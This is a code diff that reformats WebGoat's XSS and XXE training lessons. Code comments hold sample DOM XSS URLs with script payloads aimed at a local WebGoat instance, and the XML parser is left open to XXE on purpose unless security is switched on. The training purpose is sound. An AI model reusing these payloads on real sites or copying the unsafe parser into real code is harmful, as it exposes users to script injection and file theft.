+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingQuiz.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.xss;
 
+import java.io.IOException;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.GetMapping;
@@ -30,43 +31,52 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.io.IOException;
-
 @RestController
 public class CrossSiteScriptingQuiz extends AssignmentEndpoint {
 
-    String[] solutions = {"Solution 4", "Solution 3", "Solution 1", "Solution 2", "Solution 4"};
-    boolean[] guesses = new boolean[solutions.length];
+  String[] solutions = {"Solution 4", "Solution 3", "Solution 1", "Solution 2", "Solution 4"};
+  boolean[] guesses = new boolean[solutions.length];
 
-    @PostMapping("/CrossSiteScripting/quiz")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String[] question_0_solution, @RequestParam String[] question_1_solution, @RequestParam String[] question_2_solution, @RequestParam String[] question_3_solution, @RequestParam String[] question_4_solution) throws IOException {
-        int correctAnswers = 0;
+  @PostMapping("/CrossSiteScripting/quiz")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String[] question_0_solution,
+      @RequestParam String[] question_1_solution,
+      @RequestParam String[] question_2_solution,
+      @RequestParam String[] question_3_solution,
+      @RequestParam String[] question_4_solution)
+      throws IOException {
+    int correctAnswers = 0;
 
-        String[] givenAnswers = {question_0_solution[0], question_1_solution[0], question_2_solution[0], question_3_solution[0], question_4_solution[0]};
+    String[] givenAnswers = {
+      question_0_solution[0],
+      question_1_solution[0],
+      question_2_solution[0],
+      question_3_solution[0],
+      question_4_solution[0]
+    };
 
-        for (int i = 0; i < solutions.length; i++) {
-            if (givenAnswers[i].contains(solutions[i])) {
-                // answer correct
-                correctAnswers++;
-                guesses[i] = true;
-            } else {
-                // answer incorrect
-                guesses[i] = false;
-            }
-        }
-
-        if (correctAnswers == solutions.length) {
-            return success(this).build();
-        } else {
-            return failed(this).build();
-        }
+    for (int i = 0; i < solutions.length; i++) {
+      if (givenAnswers[i].contains(solutions[i])) {
+        // answer correct
+        correctAnswers++;
+        guesses[i] = true;
+      } else {
+        // answer incorrect
+        guesses[i] = false;
+      }
     }
 
-    @GetMapping("/CrossSiteScripting/quiz")
-    @ResponseBody
-    public boolean[] getResults() {
-        return this.guesses;
+    if (correctAnswers == solutions.length) {
+      return success(this).build();
+    } else {
+      return failed(this).build();
     }
+  }
 
+  @GetMapping("/CrossSiteScripting/quiz")
+  @ResponseBody
+  public boolean[] getResults() {
+    return this.guesses;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScripting.java b/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScripting.java
index e5e28b94b..11da6ea19 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScripting.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScripting.java
@@ -22,6 +22,8 @@
 
 package org.owasp.webgoat.lessons.xss;
 
+import java.security.SecureRandom;
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.container.session.UserSessionData;
@@ -30,26 +32,29 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-import java.security.SecureRandom;
-
 @RestController
 public class DOMCrossSiteScripting extends AssignmentEndpoint {
 
-    @PostMapping("/CrossSiteScripting/phone-home-xss")
-    @ResponseBody
-    public AttackResult completed(@RequestParam Integer param1,
-                                  @RequestParam Integer param2, HttpServletRequest request) {
-        UserSessionData userSessionData = getUserSessionData();
-        SecureRandom number = new SecureRandom();
-        userSessionData.setValue("randValue", String.valueOf(number.nextInt()));
+  @PostMapping("/CrossSiteScripting/phone-home-xss")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam Integer param1, @RequestParam Integer param2, HttpServletRequest request) {
+    UserSessionData userSessionData = getUserSessionData();
+    SecureRandom number = new SecureRandom();
+    userSessionData.setValue("randValue", String.valueOf(number.nextInt()));
 
-        if (param1 == 42 && param2 == 24 && request.getHeader("webgoat-requested-by").equals("dom-xss-vuln")) {
-            return success(this).output("phoneHome Response is " + userSessionData.getValue("randValue").toString()).build();
-        } else {
-            return failed(this).build();
-        }
+    if (param1 == 42
+        && param2 == 24
+        && request.getHeader("webgoat-requested-by").equals("dom-xss-vuln")) {
+      return success(this)
+          .output("phoneHome Response is " + userSessionData.getValue("randValue").toString())
+          .build();
+    } else {
+      return failed(this).build();
     }
+  }
 }
-// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E--andMoreGarbageHere
-// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
+// something like ...
+// http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E--andMoreGarbageHere
+// or
+// http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingVerifier.java b/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingVerifier.java
index d98b520a9..10e471c80 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingVerifier.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingVerifier.java
@@ -31,25 +31,33 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-/**
- * Created by jason on 11/23/16.
- */
+/** Created by jason on 11/23/16. */
 @RestController
-@AssignmentHints(value = {"xss-dom-message-hint-1", "xss-dom-message-hint-2", "xss-dom-message-hint-3", "xss-dom-message-hint-4", "xss-dom-message-hint-5", "xss-dom-message-hint-6"})
+@AssignmentHints(
+    value = {
+      "xss-dom-message-hint-1",
+      "xss-dom-message-hint-2",
+      "xss-dom-message-hint-3",
+      "xss-dom-message-hint-4",
+      "xss-dom-message-hint-5",
+      "xss-dom-message-hint-6"
+    })
 public class DOMCrossSiteScriptingVerifier extends AssignmentEndpoint {
 
-    @PostMapping("/CrossSiteScripting/dom-follow-up")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String successMessage) {
-        UserSessionData userSessionData = getUserSessionData();
-        String answer = (String) userSessionData.getValue("randValue");
+  @PostMapping("/CrossSiteScripting/dom-follow-up")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String successMessage) {
+    UserSessionData userSessionData = getUserSessionData();
+    String answer = (String) userSessionData.getValue("randValue");
 
-        if (successMessage.equals(answer)) {
-            return success(this).feedback("xss-dom-message-success").build();
-        } else {
-            return failed(this).feedback("xss-dom-message-failure").build();
-        }
+    if (successMessage.equals(answer)) {
+      return success(this).feedback("xss-dom-message-success").build();
+    } else {
+      return failed(this).feedback("xss-dom-message-failure").build();
     }
+  }
 }
-// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
-// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
+// something like ...
+// http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+// or
+// http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java b/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
index 5646f7622..a9eeb0fff 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
@@ -26,13 +26,13 @@ import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
 
 public class CrossSiteScriptingStored extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A3;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A3;
+  }
 
-    @Override
-    public String getTitle() {
-        return "xss-stored.title";
-    }
+  @Override
+  public String getTitle() {
+    return "xss-stored.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredCrossSiteScriptingVerifier.java b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredCrossSiteScriptingVerifier.java
index 559b4cb6d..0a4e89ed0 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredCrossSiteScriptingVerifier.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredCrossSiteScriptingVerifier.java
@@ -30,25 +30,25 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-/**
- * Created by jason on 11/23/16.
- */
+/** Created by jason on 11/23/16. */
 @RestController
 public class StoredCrossSiteScriptingVerifier extends AssignmentEndpoint {
 
-    //TODO This assignment seems not to be in use in the UI
-    @PostMapping("/CrossSiteScriptingStored/stored-xss-follow-up")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String successMessage) {
-        UserSessionData userSessionData = getUserSessionData();
+  // TODO This assignment seems not to be in use in the UI
+  @PostMapping("/CrossSiteScriptingStored/stored-xss-follow-up")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String successMessage) {
+    UserSessionData userSessionData = getUserSessionData();
 
-        if (successMessage.equals(userSessionData.getValue("randValue").toString())) {
-            return success(this).feedback("xss-stored-callback-success").build();
-        } else {
-            return failed(this).feedback("xss-stored-callback-failure").build();
-        }
+    if (successMessage.equals(userSessionData.getValue("randValue").toString())) {
+      return success(this).feedback("xss-stored-callback-success").build();
+    } else {
+      return failed(this).feedback("xss-stored-callback-failure").build();
     }
+  }
 }
 
-// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
-// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
+// something like ...
+// http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+// or
+// http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
index b82a87231..a501edeb1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
@@ -22,8 +22,19 @@
 
 package org.owasp.webgoat.lessons.xss.stored;
 
+import static org.springframework.http.MediaType.ALL_VALUE;
+
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.google.common.collect.Lists;
+import java.io.IOException;
+import java.time.LocalDateTime;
+import java.time.format.DateTimeFormatter;
+import java.util.ArrayList;
+import java.util.Collection;
+import java.util.Collections;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.container.session.WebSession;
@@ -36,78 +47,74 @@ import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.io.IOException;
-import java.time.LocalDateTime;
-import java.time.format.DateTimeFormatter;
-import java.util.ArrayList;
-import java.util.Collection;
-import java.util.Collections;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-
-import static org.springframework.http.MediaType.ALL_VALUE;
-
-
 @RestController
 public class StoredXssComments extends AssignmentEndpoint {
 
-    @Autowired
-    private WebSession webSession;
-    private static DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
+  @Autowired private WebSession webSession;
+  private static DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
 
-    private static final Map<String, List<Comment>> userComments = new HashMap<>();
-    private static final List<Comment> comments = new ArrayList<>();
-    private static final String phoneHomeString = "<script>webgoat.customjs.phoneHome()</script>";
+  private static final Map<String, List<Comment>> userComments = new HashMap<>();
+  private static final List<Comment> comments = new ArrayList<>();
+  private static final String phoneHomeString = "<script>webgoat.customjs.phoneHome()</script>";
 
+  static {
+    comments.add(
+        new Comment(
+            "secUriTy",
+            LocalDateTime.now().format(fmt),
+            "<script>console.warn('unit test me')</script>Comment for Unit Testing"));
+    comments.add(new Comment("webgoat", LocalDateTime.now().format(fmt), "This comment is safe"));
+    comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "This one is safe too."));
+    comments.add(
+        new Comment(
+            "guest",
+            LocalDateTime.now().format(fmt),
+            "Can you post a comment, calling webgoat.customjs.phoneHome() ?"));
+  }
 
-    static {
-        comments.add(new Comment("secUriTy", LocalDateTime.now().format(fmt), "<script>console.warn('unit test me')</script>Comment for Unit Testing"));
-        comments.add(new Comment("webgoat", LocalDateTime.now().format(fmt), "This comment is safe"));
-        comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "This one is safe too."));
-        comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "Can you post a comment, calling webgoat.customjs.phoneHome() ?"));
+  // TODO This assignment seems not to be in use in the UI
+  @GetMapping(
+      path = "/CrossSiteScriptingStored/stored-xss",
+      produces = MediaType.APPLICATION_JSON_VALUE,
+      consumes = ALL_VALUE)
+  @ResponseBody
+  public Collection<Comment> retrieveComments() {
+    List<Comment> allComments = Lists.newArrayList();
+    Collection<Comment> newComments = userComments.get(webSession.getUserName());
+    allComments.addAll(comments);
+    if (newComments != null) {
+      allComments.addAll(newComments);
     }
+    Collections.reverse(allComments);
+    return allComments;
+  }
 
-    //TODO This assignment seems not to be in use in the UI
-    @GetMapping(path = "/CrossSiteScriptingStored/stored-xss", produces = MediaType.APPLICATION_JSON_VALUE, consumes = ALL_VALUE)
-    @ResponseBody
-    public Collection<Comment> retrieveComments() {
-        List<Comment> allComments = Lists.newArrayList();
-        Collection<Comment> newComments = userComments.get(webSession.getUserName());
-        allComments.addAll(comments);
-        if (newComments != null) {
-            allComments.addAll(newComments);
-        }
-        Collections.reverse(allComments);
-        return allComments;
+  // TODO This assignment seems not to be in use in the UI
+  @PostMapping("/CrossSiteScriptingStored/stored-xss")
+  @ResponseBody
+  public AttackResult createNewComment(@RequestBody String commentStr) {
+    Comment comment = parseJson(commentStr);
+
+    List<Comment> comments = userComments.getOrDefault(webSession.getUserName(), new ArrayList<>());
+    comment.setDateTime(LocalDateTime.now().format(fmt));
+    comment.setUser(webSession.getUserName());
+
+    comments.add(comment);
+    userComments.put(webSession.getUserName(), comments);
+
+    if (comment.getText().contains(phoneHomeString)) {
+      return (success(this).feedback("xss-stored-comment-success").build());
+    } else {
+      return (failed(this).feedback("xss-stored-comment-failure").build());
     }
+  }
 
-    //TODO This assignment seems not to be in use in the UI
-    @PostMapping("/CrossSiteScriptingStored/stored-xss")
-    @ResponseBody
-    public AttackResult createNewComment(@RequestBody String commentStr) {
-        Comment comment = parseJson(commentStr);
-
-        List<Comment> comments = userComments.getOrDefault(webSession.getUserName(), new ArrayList<>());
-        comment.setDateTime(LocalDateTime.now().format(fmt));
-        comment.setUser(webSession.getUserName());
-
-        comments.add(comment);
-        userComments.put(webSession.getUserName(), comments);
-
-        if (comment.getText().contains(phoneHomeString)) {
-            return (success(this).feedback("xss-stored-comment-success").build());
-        } else {
-            return (failed(this).feedback("xss-stored-comment-failure").build());
-        }
-    }
-
-    private Comment parseJson(String comment) {
-        ObjectMapper mapper = new ObjectMapper();
-        try {
-            return mapper.readValue(comment, Comment.class);
-        } catch (IOException e) {
-            return new Comment();
-        }
+  private Comment parseJson(String comment) {
+    ObjectMapper mapper = new ObjectMapper();
+    try {
+      return mapper.readValue(comment, Comment.class);
+    } catch (IOException e) {
+      return new Comment();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignment.java b/src/main/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignment.java
index 96eb6f4a7..317ef948e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignment.java
@@ -1,5 +1,15 @@
 package org.owasp.webgoat.lessons.xxe;
 
+import static java.nio.charset.StandardCharsets.UTF_8;
+import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
+import static org.springframework.http.MediaType.ALL_VALUE;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
+
+import java.io.File;
+import java.io.IOException;
+import java.nio.file.Files;
+import java.util.HashMap;
+import java.util.Map;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -11,96 +21,93 @@ import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.io.File;
-import java.io.IOException;
-import java.nio.file.Files;
-import java.util.HashMap;
-import java.util.Map;
-
-import static java.nio.charset.StandardCharsets.UTF_8;
-import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
-import static org.springframework.http.MediaType.ALL_VALUE;
-import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
-
 /**
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  */
 @Slf4j
 @RestController
-@AssignmentHints({"xxe.blind.hints.1", "xxe.blind.hints.2", "xxe.blind.hints.3", "xxe.blind.hints.4", "xxe.blind.hints.5"})
+@AssignmentHints({
+  "xxe.blind.hints.1",
+  "xxe.blind.hints.2",
+  "xxe.blind.hints.3",
+  "xxe.blind.hints.4",
+  "xxe.blind.hints.5"
+})
 public class BlindSendFileAssignment extends AssignmentEndpoint {
 
-    private final String webGoatHomeDirectory;
-    private final CommentsCache comments;
-    private final Map<WebGoatUser, String> userToFileContents = new HashMap<>();
+  private final String webGoatHomeDirectory;
+  private final CommentsCache comments;
+  private final Map<WebGoatUser, String> userToFileContents = new HashMap<>();
 
-    public BlindSendFileAssignment(@Value("${webgoat.user.directory}") String webGoatHomeDirectory, CommentsCache comments) {
-        this.webGoatHomeDirectory = webGoatHomeDirectory;
-        this.comments = comments;
+  public BlindSendFileAssignment(
+      @Value("${webgoat.user.directory}") String webGoatHomeDirectory, CommentsCache comments) {
+    this.webGoatHomeDirectory = webGoatHomeDirectory;
+    this.comments = comments;
+  }
+
+  private void createSecretFileWithRandomContents(WebGoatUser user) {
+    var fileContents = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";
+    userToFileContents.put(user, fileContents);
+    File targetDirectory = new File(webGoatHomeDirectory, "/XXE/" + user.getUsername());
+    if (!targetDirectory.exists()) {
+      targetDirectory.mkdirs();
+    }
+    try {
+      Files.writeString(new File(targetDirectory, "secret.txt").toPath(), fileContents, UTF_8);
+    } catch (IOException e) {
+      log.error("Unable to write 'secret.txt' to '{}", targetDirectory);
+    }
+  }
+
+  @PostMapping(path = "xxe/blind", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public AttackResult addComment(@RequestBody String commentStr) {
+    var fileContentsForUser = userToFileContents.getOrDefault(getWebSession().getUser(), "");
+
+    // Solution is posted by the user as a separate comment
+    if (commentStr.contains(fileContentsForUser)) {
+      return success(this).build();
     }
 
-    private void createSecretFileWithRandomContents(WebGoatUser user) {
-        var fileContents = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";
-        userToFileContents.put(user, fileContents);
-        File targetDirectory = new File(webGoatHomeDirectory, "/XXE/" + user.getUsername());
-        if (!targetDirectory.exists()) {
-            targetDirectory.mkdirs();
-        }
-        try {
-            Files.writeString(new File(targetDirectory, "secret.txt").toPath(), fileContents, UTF_8);
-        } catch (IOException e) {
-            log.error("Unable to write 'secret.txt' to '{}", targetDirectory);
-        }
+    try {
+      Comment comment = comments.parseXml(commentStr);
+      if (fileContentsForUser.contains(comment.getText())) {
+        comment.setText("Nice try, you need to send the file to WebWolf");
+      }
+      comments.addComment(comment, false);
+    } catch (Exception e) {
+      return failed(this).output(e.toString()).build();
     }
+    return failed(this).build();
+  }
 
-    @PostMapping(path = "xxe/blind", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public AttackResult addComment(@RequestBody String commentStr) {
-        var fileContentsForUser = userToFileContents.getOrDefault(getWebSession().getUser(), "");
-
-        //Solution is posted by the user as a separate comment
-        if (commentStr.contains(fileContentsForUser)) {
-            return success(this).build();
-        }
-
-        try {
-            Comment comment = comments.parseXml(commentStr);
-            if (fileContentsForUser.contains(comment.getText())) {
-                comment.setText("Nice try, you need to send the file to WebWolf");
-            }
-            comments.addComment(comment, false);
-        } catch (Exception e) {
-            return failed(this).output(e.toString()).build();
-        }
-        return failed(this).build();
-    }
-
-    @Override
-    public void initialize(WebGoatUser user) {
-        comments.reset(user);
-        userToFileContents.remove(user);
-        createSecretFileWithRandomContents(user);
-    }
+  @Override
+  public void initialize(WebGoatUser user) {
+    comments.reset(user);
+    userToFileContents.remove(user);
+    createSecretFileWithRandomContents(user);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/Comment.java b/src/main/java/org/owasp/webgoat/lessons/xxe/Comment.java
index 37a5b42f1..90d06fdd1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/Comment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/Comment.java
@@ -22,14 +22,13 @@
 
 package org.owasp.webgoat.lessons.xxe;
 
+import javax.xml.bind.annotation.XmlRootElement;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.NoArgsConstructor;
 import lombok.Setter;
 import lombok.ToString;
 
-import javax.xml.bind.annotation.XmlRootElement;
-
 /**
  * @author nbaars
  * @since 4/8/17.
@@ -41,7 +40,7 @@ import javax.xml.bind.annotation.XmlRootElement;
 @XmlRootElement
 @ToString
 public class Comment {
-    private String user;
-    private String dateTime;
-    private String text;
+  private String user;
+  private String dateTime;
+  private String text;
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
index f020228cd..b949f0abe 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
@@ -22,17 +22,10 @@
 
 package org.owasp.webgoat.lessons.xxe;
 
-import com.fasterxml.jackson.databind.ObjectMapper;
-import org.owasp.webgoat.container.session.WebSession;
-import org.owasp.webgoat.container.users.WebGoatUser;
-import org.springframework.context.annotation.Scope;
-import org.springframework.stereotype.Component;
+import static java.util.Optional.empty;
+import static java.util.Optional.of;
 
-import javax.xml.XMLConstants;
-import javax.xml.bind.JAXBContext;
-import javax.xml.bind.JAXBException;
-import javax.xml.stream.XMLInputFactory;
-import javax.xml.stream.XMLStreamException;
+import com.fasterxml.jackson.databind.ObjectMapper;
 import java.io.IOException;
 import java.io.StringReader;
 import java.time.LocalDateTime;
@@ -42,93 +35,103 @@ import java.util.Comparator;
 import java.util.HashMap;
 import java.util.Map;
 import java.util.Optional;
-
-import static java.util.Optional.empty;
-import static java.util.Optional.of;
+import javax.xml.XMLConstants;
+import javax.xml.bind.JAXBContext;
+import javax.xml.bind.JAXBException;
+import javax.xml.stream.XMLInputFactory;
+import javax.xml.stream.XMLStreamException;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.WebGoatUser;
+import org.springframework.context.annotation.Scope;
+import org.springframework.stereotype.Component;
 
 @Component
 @Scope("singleton")
 public class CommentsCache {
 
-    static class Comments extends ArrayList<Comment> {
-        void sort() {
-            sort(Comparator.comparing(Comment::getDateTime).reversed());
-        }
+  static class Comments extends ArrayList<Comment> {
+    void sort() {
+      sort(Comparator.comparing(Comment::getDateTime).reversed());
+    }
+  }
+
+  private static final Comments comments = new Comments();
+  private static final Map<WebGoatUser, Comments> userComments = new HashMap<>();
+  private static final DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
+
+  private final WebSession webSession;
+
+  public CommentsCache(WebSession webSession) {
+    this.webSession = webSession;
+    initDefaultComments();
+  }
+
+  void initDefaultComments() {
+    comments.add(new Comment("webgoat", LocalDateTime.now().format(fmt), "Silly cat...."));
+    comments.add(
+        new Comment(
+            "guest",
+            LocalDateTime.now().format(fmt),
+            "I think I will use this picture in one of my projects."));
+    comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "Lol!! :-)."));
+  }
+
+  protected Comments getComments() {
+    Comments allComments = new Comments();
+    Comments commentsByUser = userComments.get(webSession.getUser());
+    if (commentsByUser != null) {
+      allComments.addAll(commentsByUser);
+    }
+    allComments.addAll(comments);
+    allComments.sort();
+    return allComments;
+  }
+
+  /**
+   * Notice this parse method is not a "trick" to get the XXE working, we need to catch some of the
+   * exception which might happen during when users post message (we want to give feedback track
+   * progress etc). In real life the XmlMapper bean defined above will be used automatically and the
+   * Comment class can be directly used in the controller method (instead of a String)
+   */
+  protected Comment parseXml(String xml) throws JAXBException, XMLStreamException {
+    var jc = JAXBContext.newInstance(Comment.class);
+    var xif = XMLInputFactory.newInstance();
+
+    if (webSession.isSecurityEnabled()) {
+      xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
+      xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
     }
 
-    private static final Comments comments = new Comments();
-    private static final Map<WebGoatUser, Comments> userComments = new HashMap<>();
-    private static final DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
+    var xsr = xif.createXMLStreamReader(new StringReader(xml));
 
-    private final WebSession webSession;
+    var unmarshaller = jc.createUnmarshaller();
+    return (Comment) unmarshaller.unmarshal(xsr);
+  }
 
-    public CommentsCache(WebSession webSession) {
-        this.webSession = webSession;
-        initDefaultComments();
+  protected Optional<Comment> parseJson(String comment) {
+    ObjectMapper mapper = new ObjectMapper();
+    try {
+      return of(mapper.readValue(comment, Comment.class));
+    } catch (IOException e) {
+      return empty();
     }
+  }
 
-    void initDefaultComments() {
-        comments.add(new Comment("webgoat", LocalDateTime.now().format(fmt), "Silly cat...."));
-        comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "I think I will use this picture in one of my projects."));
-        comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "Lol!! :-)."));
+  public void addComment(Comment comment, boolean visibleForAllUsers) {
+    comment.setDateTime(LocalDateTime.now().format(fmt));
+    comment.setUser(webSession.getUserName());
+    if (visibleForAllUsers) {
+      comments.add(comment);
+    } else {
